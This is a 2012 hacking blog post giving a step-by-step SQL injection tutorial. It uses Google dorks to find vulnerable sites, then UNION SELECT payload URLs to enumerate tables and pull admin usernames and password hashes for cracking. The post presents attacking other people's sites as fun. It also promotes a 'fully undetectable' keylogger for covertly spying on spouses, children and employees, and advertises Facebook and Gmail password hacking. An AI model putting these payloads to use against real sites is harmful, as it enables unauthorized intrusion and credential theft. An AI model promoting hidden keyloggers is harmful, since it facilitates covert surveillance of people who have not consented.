Latest: Hack Facebook Password! | Wants To Hack CellPhone | Trace Mobile Number(only US) ! | New : Best FUD Keylogger!

Featured Posts

hack mobile

Thursday, May 17, 2012

Website Hacking : How to find a vulnerable Website?? Part 2

Posted by wildrank on Thursday, May 17, 2012
As we had discussed about basic information of website hacking in my last article on wildhacker. Today i am writing article on "How to find a vulnerable Website using Dork???" Now a days Website Hacking has become a tradition or fun to create problems for other people. Hackers are searching for finding the holes in the websites having high page ranks and traffic.

Today in this article, I am going to teach you how to find website vulnerablility using Dork. Here i have shared some Dorks which you can use to fine vulnerable Website through google.

If you have not read part 1 I strongly recommend you do: Basic Information About Website Hacking Part 1

website hacking

You might be interested in some of our other articles:
Don’t forget to Subscribe to our RSS feed

How to find a vulnerable Website Using Dork?


What is an SQL Injection?

SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application (like queries). The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.

How do I know if the site is vulnerable?

Well, the most basic way to do it, and the easiest, would be to use an SQLi Scanner, such as Acunetix Web Vulnerability Scanner

Alternatively, you can search manually using something called a "Dork".

So what is a dork?

A dork is a simple search used on google ( or other search engines ) that brings up sites you are specifically looking for.

List of Google Dork:
inurl:gallery.php?id=

inurl:pages.php?id=

inurl:post.php?id=

inurl:view.php?id=

inurl:source.php?id=

inurl:index.php?id=

inurl:article?id=

Using the manual method will take a lot of trial and error.

Once you have your site, to check if it is vulnerable, simply add an apostrophe ( ' ) to the end of the url.

Example:
http://www.examplesite.com/category.php?id=5'

If the site is vulnerable, you will see the following error or something similar somewhere on the page.

" Error executing query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\\' ORDER BY date_added DESC' at line 1 "

If you get this, the site should be vulnerable. So far so good!

How many columns?


Our next step is to find the number of columns in the database. To do this we use the ORDER BY query. We get our normal site URL, and add ORDER BY 1-- to the end of it. Example:

Quote:
http://www.examplesite.com/category.php?id=5 order by 1--

The page should then show up as normal. Now we have to increase this number until we get an error.

Quote:
http://www.examplesite.com/category.php?id=5 order by 1-- No error
http://www.examplesite.com/category.php?id=5 order by 2-- No error
http://www.examplesite.com/category.php?id=5 order by 3-- Error

We got an error on 3, so that means our number of columns is 2 (The max column number before getting an error).

Union Select Query

We use the union select statement to combine the results of multiple querys in our SQLi. To test if it works, go to our sites normal URL, and write "union select 1,2--" (without quotes) after it. In our example, we use 1,2--, but on other sites, you will usually have a different number of columns. Example: On a site with 5 columns it would be "union select 1,2,3,4,5--".

Quote:
http://www.examplesite.com/category.php?id=-5 union select 1,2--

Notice that there is a - in front of the 5. This is done to remove all text from the webpage, so we can see the results of our query on the page (Explanation. There isn't a -5 page anywhere on the site, so it uses the usual site template, but without the images and text of that specific page).

If union select worked, we should have no SQL errors. We also should now see a few numbers on the page that normally aren't there. For our example, we will say that both 1 and 2 showed up on our page.

What SQL Version does my site use?

This will be one of the easier things to do. After we have tested union (and it works!) we simply input "version()" in to one of the numbers in our URL, but these numbers have to be visible on the page, otherwise we won't be able to see the returned query result. Example:

Quote:
http://www.examplesite.com/category.php?id=-5 union select 1,version()--

This will replace the number 2 on our page with the SQL version. For our example we will use version 5 and above.

Finding table names

Now we are going to get into the tables. This is where all the information you are looking for will be kept, but first, we need to find the table names. To do so, replace version() with group_concat(table_name). Then after your last column number, add from information_schema.tables--. Example:

Quote:
http://www.examplesite.com/category.php?id=-5 union select 1,group_concat(table_name) from information_schema.tables--

On the page you should now have a list of all the table names in the database.

Finding the column names

To find the column names we do the same thing, but replace tables with columns, but we include which table to get the column names from. If we found a table called admin. Example,

Quote:
http://www.examplesite.com/category.php?id=-5 union select 1,group_concat(column_name) from information_schema.columns where table_name='admin'--

Q: I get an error when I do this, or no column names are shown!

A: Magic quotes is on. To bypass this, you must convert the table name to Hex.
You can do this by going to http://www.swingnote.com/tools/texttohex.php . Our query would now look like this:

Quote:
http://www.examplesite.com/category.php?id=-5 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x61646d696e --

Note: the 0x tells the computer the following string is in hex.

Lets say the column names were username and password.

Final Step: Getting our information.

To finish it off, we want to find out what the columns contain, otherwise, this has all been for nothing! To do so we get our normal site URL and add "union select 1,concat(username,0x3a,password) from admin--".

This will show the username and password from the table admin! Usually your password will be a hash, so you can use an online MD5 Cracker such as MD5Crack or use a program such as Cain and Abel to decrypt the password hash.

Keylogger: Most of the public crypters and keyloggers are detected by antiviruses. If you want to have a FUD version of keylogger, please use best Hacking software- Winspy Keylogger which is FUD(Fully UnDetectable). This is personally recommended keylogger from wildhacker.

So friends, I hope you will like this
How to find a vulnerable Website tutorial.
I have personally tested this dorks and found all are working. If you have any problem in above article, please mention it in comments section.

Enjoy Website Hacking ........


If you enjoyed this post and wish to be informed whenever a new post is published, then make sure you subscribe to my regular Email Updates. Subscribe Now!



Do you need to know what your child is doing on the computer? Do you want to know what your loved ones or spouse or kids are doing on the computer? Do you need to monitor what your employees are doing during work hours? Are they working or playing?

Winspy Keylogger is intended to help you in these kind of situations. It can show you exactly what is being done on the computer at any time.

Click Here To Download Winspy Keylogger
 
  • Gmail Hacking

    Wants to hack Gmail a/c password ? Learn best way to hack Gmail password..

  • Jailbreak Iphone/iPad

    Jailbreak your Iphone or iPad to give it more functionality free of cost...

  • Facebook Hacking

    Wants to hack Facebook password? But Don't Know Where to Start? Learn here......

  • MAC Keylogger

    Learn how to hack emails account password on MAC OS using keylogger....

  • Mobile Hacking

    Monitor mobiles,Records the activities of anyone who uses iPhone, BlackBerry....

Disclaimer

ALL INFORMATION / TUTORIALS WRITTEN ON WILDHACKER.COM ARE FOR EDUCATIONAL PURPOSES ONLY, THE SITE WILDHACKER.COM IS NOT RESPONSIBLE IN ANY WAY FOR HOW THIS INFORMATION IS USED, YOU USE IT AT YOUR OWN RISK. YOU MAY LEARN ALSO HOW TO GET YOUR OWN ACCOUNT BACK FROM ALL THIS INFRORMATION.

Recipes

Unlock Iphone Website Hacking

Facebook Hacking Keylogger

Unlock Blackberry Unlock Modem

Gmail Hacking Hack Yahoo

Hotmail Hacking Remote Hacking

Blog Archive

Traffic / Ranking

Powered by:

Wild Hacker © 2012. All Rights Reserved | Contact | Bloggers.com